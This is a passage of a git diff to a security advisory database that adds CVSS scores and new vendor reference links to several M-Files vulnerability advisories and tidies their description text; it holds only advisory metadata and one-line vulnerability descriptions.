+- .../GHSA-8gqc-w5g5-j344.json | 6 +- .../GHSA-8whh-2x7g-j9cx.json | 6 +- .../GHSA-9438-qf7w-49rg.json | 6 +- .../GHSA-9g9c-c6jm-98g4.json | 6 +- .../GHSA-c99x-xcf4-fhgm.json | 6 +- .../GHSA-c9rh-2qq3-frxv.json | 6 +- .../GHSA-f679-6xgj-qqcg.json | 6 +- .../GHSA-fgq8-gvxr-ghw7.json | 6 +- .../GHSA-fprw-935f-f6f7.json | 6 +- .../GHSA-g5rv-h647-hjj3.json | 6 +- .../GHSA-gq8r-4rr6-wr2q.json | 6 +- .../GHSA-grwh-fmhg-rqcq.json | 6 +- .../GHSA-h4jj-hgv3-ppwg.json | 2 +- .../GHSA-hqj6-7698-rxx4.json | 6 +- .../GHSA-j6q4-mvcw-hpgm.json | 6 +- .../GHSA-jqv9-g2ph-pfw9.json | 6 +- .../GHSA-jvvr-947r-5jcr.json | 6 +- .../GHSA-m43m-9cwc-jq98.json | 6 +- .../GHSA-m9r7-9m8m-9f64.json | 6 +- .../GHSA-mf3r-3jp8-f7f5.json | 6 +- .../GHSA-mp27-9vf3-rfc6.json | 6 +- .../GHSA-mw2p-3c2q-3gxg.json | 10 +++- .../GHSA-q4m9-3fr6-f83p.json | 6 +- .../GHSA-q4xv-cr27-98cp.json | 6 +- .../GHSA-q9fv-9fr9-69p3.json | 6 +- .../GHSA-qvgm-c3f9-m43m.json | 6 +- .../GHSA-r58r-mmgc-mr7f.json | 6 +- .../GHSA-rcpp-qhfh-r47v.json | 6 +- .../GHSA-rf69-3jvx-93qp.json | 6 +- .../GHSA-vrx4-99h7-rgjh.json | 2 +- .../GHSA-x3rh-6rvx-g8m2.json | 6 +- .../GHSA-xc7m-2p37-4qw2.json | 6 +- .../GHSA-xvvx-g2mg-wqw5.json | 6 +- .../GHSA-429q-mrc4-38fr.json | 35 ++++++++++++ .../GHSA-7jmh-rhmc-g5gq.json | 36 ++++++++++++ .../GHSA-9vfc-93vc-6ffp.json | 56 +++++++++++++++++++ .../GHSA-c3f3-cc42-xr9v.json | 35 ++++++++++++ .../GHSA-fhhg-8jv8-7rcw.json | 36 ++++++++++++ .../GHSA-h4v7-f6v2-4hmm.json | 52 +++++++++++++++++ .../GHSA-m5p7-pf66-25qw.json | 56 +++++++++++++++++++ .../GHSA-m879-6gvr-239v.json | 52 +++++++++++++++++ .../GHSA-p2cq-gh8c-83cc.json | 52 +++++++++++++++++ .../GHSA-qmq9-8xrr-rx63.json | 52 +++++++++++++++++ .../GHSA-rgpr-47mq-rh3c.json | 52 +++++++++++++++++ 91 files changed, 967 insertions(+), 90 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7jmh-rhmc-g5gq/GHSA-7jmh-rhmc-g5gq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9vfc-93vc-6ffp/GHSA-9vfc-93vc-6ffp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fhhg-8jv8-7rcw/GHSA-fhhg-8jv8-7rcw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h4v7-f6v2-4hmm/GHSA-h4v7-f6v2-4hmm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m5p7-pf66-25qw/GHSA-m5p7-pf66-25qw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m879-6gvr-239v/GHSA-m879-6gvr-239v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p2cq-gh8c-83cc/GHSA-p2cq-gh8c-83cc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qmq9-8xrr-rx63/GHSA-qmq9-8xrr-rx63.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rgpr-47mq-rh3c/GHSA-rgpr-47mq-rh3c.json diff --git a/advisories/unreviewed/2022/01/GHSA-5c8j-7c6c-838x/GHSA-5c8j-7c6c-838x.json b/advisories/unreviewed/2022/01/GHSA-5c8j-7c6c-838x/GHSA-5c8j-7c6c-838x.json index c3c569aea530d..41ac046000665 100644 --- a/advisories/unreviewed/2022/01/GHSA-5c8j-7c6c-838x/GHSA-5c8j-7c6c-838x.json +++ b/advisories/unreviewed/2022/01/GHSA-5c8j-7c6c-838x/GHSA-5c8j-7c6c-838x.json @@ -1,19 +1,28 @@ { "schema_version": "1.4.0", "id": "GHSA-5c8j-7c6c-838x", - "modified": "2022-01-27T00:04:03Z", + "modified": "2026-02-23T09:31:16Z", "published": "2022-01-19T00:01:07Z", "aliases": [ "CVE-2021-41807" ], "details": "Lack of rate limiting in M-Files Server and M-Files Web products with versions before 21.12.10873.0 in certain type of user accounts allows unlimited amount of attempts and therefore makes brute-forcing login accounts easier.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41807" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2021-41807" + }, { "type": "WEB", "url": "https://www.m-files.com/about/trust-center/security-vulnerabilities/cve-2021-41807" diff --git a/advisories/unreviewed/2022/01/GHSA-h62q-wxxr-4qqj/GHSA-h62q-wxxr-4qqj.json b/advisories/unreviewed/2022/01/GHSA-h62q-wxxr-4qqj/GHSA-h62q-wxxr-4qqj.json index c066733e89b9b..e4073ccceb8f4 100644 --- a/advisories/unreviewed/2022/01/GHSA-h62q-wxxr-4qqj/GHSA-h62q-wxxr-4qqj.json +++ b/advisories/unreviewed/2022/01/GHSA-h62q-wxxr-4qqj/GHSA-h62q-wxxr-4qqj.json @@ -1,19 +1,28 @@ { "schema_version": "1.4.0", "id": "GHSA-h62q-wxxr-4qqj", - "modified": "2022-01-27T00:04:01Z", + "modified": "2026-02-23T09:31:16Z", "published": "2022-01-19T00:01:07Z", "aliases": [ "CVE-2021-41808" ], "details": "In M-Files Server product with versions before 21.11.10775.0, enabling logging of Federated authentication to event log wrote sensitive information to log. Mitigating factors are logging is disabled by default.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41808" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2021-41808" + }, { "type": "WEB", "url": "https://www.m-files.com/about/trust-center/security-vulnerabilities/cve-2021-41808" diff --git a/advisories/unreviewed/2022/01/GHSA-wrw2-8vg5-g3jj/GHSA-wrw2-8vg5-g3jj.json b/advisories/unreviewed/2022/01/GHSA-wrw2-8vg5-g3jj/GHSA-wrw2-8vg5-g3jj.json index 6e542ef50835d..7949473715e52 100644 --- a/advisories/unreviewed/2022/01/GHSA-wrw2-8vg5-g3jj/GHSA-wrw2-8vg5-g3jj.json +++ b/advisories/unreviewed/2022/01/GHSA-wrw2-8vg5-g3jj/GHSA-wrw2-8vg5-g3jj.json @@ -1,19 +1,28 @@ { "schema_version": "1.4.0", "id": "GHSA-wrw2-8vg5-g3jj", - "modified": "2022-01-27T00:04:00Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-01-19T00:01:07Z", "aliases": [ "CVE-2021-41809" ], "details": "SSRF vulnerability in M-Files Server products with versions before 22.1.11017.1, in a preview function allowed making queries from the server with certain document types referencing external entities.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41809" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2021-41809" + }, { "type": "WEB", "url": "https://www.m-files.com/about/trust-center/security-vulnerabilities/cve-2021-41809" diff --git a/advisories/unreviewed/2022/11/GHSA-6w8q-wgfc-hxx8/GHSA-6w8q-wgfc-hxx8.json b/advisories/unreviewed/2022/11/GHSA-6w8q-wgfc-hxx8/GHSA-6w8q-wgfc-hxx8.json index 9def7007ef0c2..1fd518f8196d9 100644 --- a/advisories/unreviewed/2022/11/GHSA-6w8q-wgfc-hxx8/GHSA-6w8q-wgfc-hxx8.json +++ b/advisories/unreviewed/2022/11/GHSA-6w8q-wgfc-hxx8/GHSA-6w8q-wgfc-hxx8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6w8q-wgfc-hxx8", - "modified": "2024-08-28T12:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-11-30T15:30:27Z", "aliases": [ "CVE-2022-1606" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1606" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-1606" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-1606" diff --git a/advisories/unreviewed/2022/11/GHSA-hx75-3jr9-944m/GHSA-hx75-3jr9-944m.json b/advisories/unreviewed/2022/11/GHSA-hx75-3jr9-944m/GHSA-hx75-3jr9-944m.json index 93306ce0e00be..3d4d269484d1e 100644 --- a/advisories/unreviewed/2022/11/GHSA-hx75-3jr9-944m/GHSA-hx75-3jr9-944m.json +++ b/advisories/unreviewed/2022/11/GHSA-hx75-3jr9-944m/GHSA-hx75-3jr9-944m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hx75-3jr9-944m", - "modified": "2024-08-28T12:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-11-30T15:30:27Z", "aliases": [ "CVE-2022-1911" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1911" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-1911" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-1911" diff --git a/advisories/unreviewed/2022/12/GHSA-cmrr-4p45-4xv3/GHSA-cmrr-4p45-4xv3.json b/advisories/unreviewed/2022/12/GHSA-cmrr-4p45-4xv3/GHSA-cmrr-4p45-4xv3.json index aa181276c0dfa..f950eeefbbf9c 100644 --- a/advisories/unreviewed/2022/12/GHSA-cmrr-4p45-4xv3/GHSA-cmrr-4p45-4xv3.json +++ b/advisories/unreviewed/2022/12/GHSA-cmrr-4p45-4xv3/GHSA-cmrr-4p45-4xv3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cmrr-4p45-4xv3", - "modified": "2024-08-28T12:30:33Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-12-30T12:30:25Z", "aliases": [ "CVE-2022-4858" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4858" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-4858" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-4858" diff --git a/advisories/unreviewed/2022/12/GHSA-fh2m-jrq8-h6q5/GHSA-fh2m-jrq8-h6q5.json b/advisories/unreviewed/2022/12/GHSA-fh2m-jrq8-h6q5/GHSA-fh2m-jrq8-h6q5.json index 8876e166129f3..0ecedd0c3eb4d 100644 --- a/advisories/unreviewed/2022/12/GHSA-fh2m-jrq8-h6q5/GHSA-fh2m-jrq8-h6q5.json +++ b/advisories/unreviewed/2022/12/GHSA-fh2m-jrq8-h6q5/GHSA-fh2m-jrq8-h6q5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fh2m-jrq8-h6q5", - "modified": "2024-08-28T12:30:32Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-12-02T15:30:26Z", "aliases": [ "CVE-2022-4270" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4270" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-4270" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-4270" diff --git a/advisories/unreviewed/2022/12/GHSA-j86w-j9vr-w3pm/GHSA-j86w-j9vr-w3pm.json b/advisories/unreviewed/2022/12/GHSA-j86w-j9vr-w3pm/GHSA-j86w-j9vr-w3pm.json index 06df8ceceaeb9..83304ebccd5b7 100644 --- a/advisories/unreviewed/2022/12/GHSA-j86w-j9vr-w3pm/GHSA-j86w-j9vr-w3pm.json +++ b/advisories/unreviewed/2022/12/GHSA-j86w-j9vr-w3pm/GHSA-j86w-j9vr-w3pm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j86w-j9vr-w3pm", - "modified": "2024-08-28T12:30:32Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-12-09T15:30:29Z", "aliases": [ "CVE-2022-4264" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4264" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-4264" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-4264" diff --git a/advisories/unreviewed/2022/12/GHSA-qx2w-wx28-8mhv/GHSA-qx2w-wx28-8mhv.json b/advisories/unreviewed/2022/12/GHSA-qx2w-wx28-8mhv/GHSA-qx2w-wx28-8mhv.json index fcc5f97556b5f..5afc2cfae1efd 100644 --- a/advisories/unreviewed/2022/12/GHSA-qx2w-wx28-8mhv/GHSA-qx2w-wx28-8mhv.json +++ b/advisories/unreviewed/2022/12/GHSA-qx2w-wx28-8mhv/GHSA-qx2w-wx28-8mhv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qx2w-wx28-8mhv", - "modified": "2024-08-28T12:30:33Z", + "modified": "2026-02-23T09:31:17Z", "published": "2022-12-30T15:30:22Z", "aliases": [ "CVE-2022-4861" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4861" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-4861" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-4861" diff --git a/advisories/unreviewed/2023/03/GHSA-f75p-j579-8r2c/GHSA-f75p-j579-8r2c.json b/advisories/unreviewed/2023/03/GHSA-f75p-j579-8r2c/GHSA-f75p-j579-8r2c.json index 341010b38f95e..e479da9829027 100644 --- a/advisories/unreviewed/2023/03/GHSA-f75p-j579-8r2c/GHSA-f75p-j579-8r2c.json +++ b/advisories/unreviewed/2023/03/GHSA-f75p-j579-8r2c/GHSA-f75p-j579-8r2c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f75p-j579-8r2c", - "modified": "2024-08-28T09:30:30Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-03-29T12:30:35Z", "aliases": [ "CVE-2023-0213" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0213" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-0213" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-0213" diff --git a/advisories/unreviewed/2023/03/GHSA-j6v8-rcm6-wxr2/GHSA-j6v8-rcm6-wxr2.json b/advisories/unreviewed/2023/03/GHSA-j6v8-rcm6-wxr2/GHSA-j6v8-rcm6-wxr2.json index 0a15fd9c4a331..64d0aa9989a84 100644 --- a/advisories/unreviewed/2023/03/GHSA-j6v8-rcm6-wxr2/GHSA-j6v8-rcm6-wxr2.json +++ b/advisories/unreviewed/2023/03/GHSA-j6v8-rcm6-wxr2/GHSA-j6v8-rcm6-wxr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j6v8-rcm6-wxr2", - "modified": "2024-08-28T12:30:33Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-03-06T12:30:15Z", "aliases": [ "CVE-2022-4862" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4862" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-4862" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-4862" diff --git a/advisories/unreviewed/2023/03/GHSA-r92f-q253-q9wv/GHSA-r92f-q253-q9wv.json b/advisories/unreviewed/2023/03/GHSA-r92f-q253-q9wv/GHSA-r92f-q253-q9wv.json index 81576a2b95ae3..12f3d62d1f391 100644 --- a/advisories/unreviewed/2023/03/GHSA-r92f-q253-q9wv/GHSA-r92f-q253-q9wv.json +++ b/advisories/unreviewed/2023/03/GHSA-r92f-q253-q9wv/GHSA-r92f-q253-q9wv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r92f-q253-q9wv", - "modified": "2024-08-28T12:30:33Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-03-06T12:30:16Z", "aliases": [ "CVE-2022-3284" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3284" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2022-3284" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2022-3284" diff --git a/advisories/unreviewed/2023/04/GHSA-24q2-4vqq-qcx6/GHSA-24q2-4vqq-qcx6.json b/advisories/unreviewed/2023/04/GHSA-24q2-4vqq-qcx6/GHSA-24q2-4vqq-qcx6.json index c5d381655c6d4..e02c4f5ff7698 100644 --- a/advisories/unreviewed/2023/04/GHSA-24q2-4vqq-qcx6/GHSA-24q2-4vqq-qcx6.json +++ b/advisories/unreviewed/2023/04/GHSA-24q2-4vqq-qcx6/GHSA-24q2-4vqq-qcx6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-24q2-4vqq-qcx6", - "modified": "2024-08-28T09:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-04-05T09:30:18Z", "aliases": [ "CVE-2023-0382" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0382" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-0382" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-0382" diff --git a/advisories/unreviewed/2023/04/GHSA-752c-24px-69m9/GHSA-752c-24px-69m9.json b/advisories/unreviewed/2023/04/GHSA-752c-24px-69m9/GHSA-752c-24px-69m9.json index 3b298312f97ae..8038689fd87b1 100644 --- a/advisories/unreviewed/2023/04/GHSA-752c-24px-69m9/GHSA-752c-24px-69m9.json +++ b/advisories/unreviewed/2023/04/GHSA-752c-24px-69m9/GHSA-752c-24px-69m9.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-752c-24px-69m9", - "modified": "2024-08-28T09:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-04-20T09:30:17Z", "aliases": [ "CVE-2023-0384" ], - "details": "\nUser-controlled operations could have allowed Denial of Service in M-Files Server before 23.4.12528.1\n\n due to uncontrolled memory consumption for a scheduled job.\n\n\n\n", + "details": "User-controlled operations could have allowed Denial of Service in M-Files Server before 23.4.12528.1\n\n due to uncontrolled memory consumption for a scheduled job.", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0384" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-0384" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-0384" diff --git a/advisories/unreviewed/2023/04/GHSA-mq99-fg37-h9r3/GHSA-mq99-fg37-h9r3.json b/advisories/unreviewed/2023/04/GHSA-mq99-fg37-h9r3/GHSA-mq99-fg37-h9r3.json index 091544649ca32..449315246b107 100644 --- a/advisories/unreviewed/2023/04/GHSA-mq99-fg37-h9r3/GHSA-mq99-fg37-h9r3.json +++ b/advisories/unreviewed/2023/04/GHSA-mq99-fg37-h9r3/GHSA-mq99-fg37-h9r3.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-mq99-fg37-h9r3", - "modified": "2024-08-28T09:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-04-20T09:30:17Z", "aliases": [ "CVE-2023-0383" ], - "details": "\nUser-controlled operations could have allowed Denial of Service in M-Files Server before 23.4.12528.1\n\n due to uncontrolled memory consumption.\n\n\n\n", + "details": "User-controlled operations could have allowed Denial of Service in M-Files Server before 23.4.12528.1\n\n due to uncontrolled memory consumption.", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0383" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-0383" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-0383" diff --git a/advisories/unreviewed/2023/05/GHSA-xgf2-5w76-r5jg/GHSA-xgf2-5w76-r5jg.json b/advisories/unreviewed/2023/05/GHSA-xgf2-5w76-r5jg/GHSA-xgf2-5w76-r5jg.json index 2df8c13b6ebc2..2651e8496021a 100644 --- a/advisories/unreviewed/2023/05/GHSA-xgf2-5w76-r5jg/GHSA-xgf2-5w76-r5jg.json +++ b/advisories/unreviewed/2023/05/GHSA-xgf2-5w76-r5jg/GHSA-xgf2-5w76-r5jg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xgf2-5w76-r5jg", - "modified": "2024-08-28T09:30:32Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-05-25T15:30:17Z", "aliases": [ "CVE-2023-2480" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2480" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-2480" + }, { "type": "WEB", "url": "https://https://www.m-files.com/about/trust-center/security-advisories/cve-2023-2480" diff --git a/advisories/unreviewed/2023/06/GHSA-g4w4-pwm7-7rv4/GHSA-g4w4-pwm7-7rv4.json b/advisories/unreviewed/2023/06/GHSA-g4w4-pwm7-7rv4/GHSA-g4w4-pwm7-7rv4.json index 81091df2426ce..0048649df753f 100644 --- a/advisories/unreviewed/2023/06/GHSA-g4w4-pwm7-7rv4/GHSA-g4w4-pwm7-7rv4.json +++ b/advisories/unreviewed/2023/06/GHSA-g4w4-pwm7-7rv4/GHSA-g4w4-pwm7-7rv4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4w4-pwm7-7rv4", - "modified": "2024-08-28T09:30:32Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-06-27T15:30:28Z", "aliases": [ "CVE-2023-3405" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3405" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-3405" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-3405" diff --git a/advisories/unreviewed/2023/07/GHSA-94c6-66pj-36g9/GHSA-94c6-66pj-36g9.json b/advisories/unreviewed/2023/07/GHSA-94c6-66pj-36g9/GHSA-94c6-66pj-36g9.json index 68313833d90ac..e8ea0a39d95f2 100644 --- a/advisories/unreviewed/2023/07/GHSA-94c6-66pj-36g9/GHSA-94c6-66pj-36g9.json +++ b/advisories/unreviewed/2023/07/GHSA-94c6-66pj-36g9/GHSA-94c6-66pj-36g9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-94c6-66pj-36g9", - "modified": "2024-08-28T09:30:31Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-07-06T19:24:16Z", "aliases": [ "CVE-2023-2112" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2112" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-2112" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-2112" diff --git a/advisories/unreviewed/2023/08/GHSA-fx24-f32v-56xf/GHSA-fx24-f32v-56xf.json b/advisories/unreviewed/2023/08/GHSA-fx24-f32v-56xf/GHSA-fx24-f32v-56xf.json index 0858fa157f1c4..cc2fc63879938 100644 --- a/advisories/unreviewed/2023/08/GHSA-fx24-f32v-56xf/GHSA-fx24-f32v-56xf.json +++ b/advisories/unreviewed/2023/08/GHSA-fx24-f32v-56xf/GHSA-fx24-f32v-56xf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fx24-f32v-56xf", - "modified": "2024-08-28T09:30:32Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-08-25T09:30:21Z", "aliases": [ "CVE-2023-3425" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3425" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-3425" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-3425" diff --git a/advisories/unreviewed/2023/08/GHSA-g25q-jw4h-pppq/GHSA-g25q-jw4h-pppq.json b/advisories/unreviewed/2023/08/GHSA-g25q-jw4h-pppq/GHSA-g25q-jw4h-pppq.json index 41b762f72236a..7a3d75882a363 100644 --- a/advisories/unreviewed/2023/08/GHSA-g25q-jw4h-pppq/GHSA-g25q-jw4h-pppq.json +++ b/advisories/unreviewed/2023/08/GHSA-g25q-jw4h-pppq/GHSA-g25q-jw4h-pppq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g25q-jw4h-pppq", - "modified": "2024-08-28T09:30:32Z", + "modified": "2026-02-23T09:31:17Z", "published": "2023-08-25T09:30:21Z", "aliases": [ "CVE-2023-3406" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3406" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-3406" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-3406" diff --git a/advisories/unreviewed/2023/10/GHSA-566r-vx98-9rr7/GHSA-566r-vx98-9rr7.json b/advisories/unreviewed/2023/10/GHSA-566r-vx98-9rr7/GHSA-566r-vx98-9rr7.json index 4a664e7b13098..efe2daf016191 100644 --- a/advisories/unreviewed/2023/10/GHSA-566r-vx98-9rr7/GHSA-566r-vx98-9rr7.json +++ b/advisories/unreviewed/2023/10/GHSA-566r-vx98-9rr7/GHSA-566r-vx98-9rr7.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-566r-vx98-9rr7", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-10-20T09:30:27Z", "aliases": [ "CVE-2023-2325" ], - "details": "Stored XSS Vulnerability in M-Files Classic Web versions before 23.10 and LTS Service Release Versions before 23.2 LTS SR4 and 23.8 LTS SR1allows attacker to execute script on users browser via stored HTML document.\n\n", + "details": "Stored XSS Vulnerability in M-Files Classic Web versions before 23.10 and LTS Service Release Versions before 23.2 LTS SR4 and 23.8 LTS SR1allows attacker to execute script on users browser via stored HTML document.", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2325" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-2325" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-2325" diff --git a/advisories/unreviewed/2023/10/GHSA-94xm-wg2w-cvfq/GHSA-94xm-wg2w-cvfq.json b/advisories/unreviewed/2023/10/GHSA-94xm-wg2w-cvfq/GHSA-94xm-wg2w-cvfq.json index 7565cbb05a1e5..1a9a0f285ae11 100644 --- a/advisories/unreviewed/2023/10/GHSA-94xm-wg2w-cvfq/GHSA-94xm-wg2w-cvfq.json +++ b/advisories/unreviewed/2023/10/GHSA-94xm-wg2w-cvfq/GHSA-94xm-wg2w-cvfq.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-94xm-wg2w-cvfq", - "modified": "2024-08-28T09:30:33Z", + "modified": "2026-02-23T09:31:18Z", "published": "2023-10-20T09:30:28Z", "aliases": [ "CVE-2023-5523" ], - "details": "Execution of downloaded content flaw in M-Files Web Companion before release version 23.10 and LTS Service Release Versions before 23.8 LTS SR1 allows \n\nRemote Code Execution \n\n", + "details": "Execution of downloaded content flaw in M-Files Web Companion before release version 23.10 and LTS Service Release Versions before 23.8 LTS SR1 allows \n\nRemote Code Execution ", "severity": [ { "type": "CVSS_V3", @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5523" }, + { + "type": "WEB", + "url": "https://empower.m-files.com/security-advisories/CVE-2023-5523" + }, { "type": "WEB", "url": "https://product.m-files.com/security-advisories/cve-2023-5523" diff --git a/advisories/unreviewed/2023/10/GHSA-r2vj-428g-v68v/GHSA-r2vj-428g-v68v.json b/advisories/unreviewed/2023/10/GHSA-r2vj-428g-v68v/GHSA-r2vj-428g-v68v.json index 423974c2745dc..de3603ebcc973 100644 --- 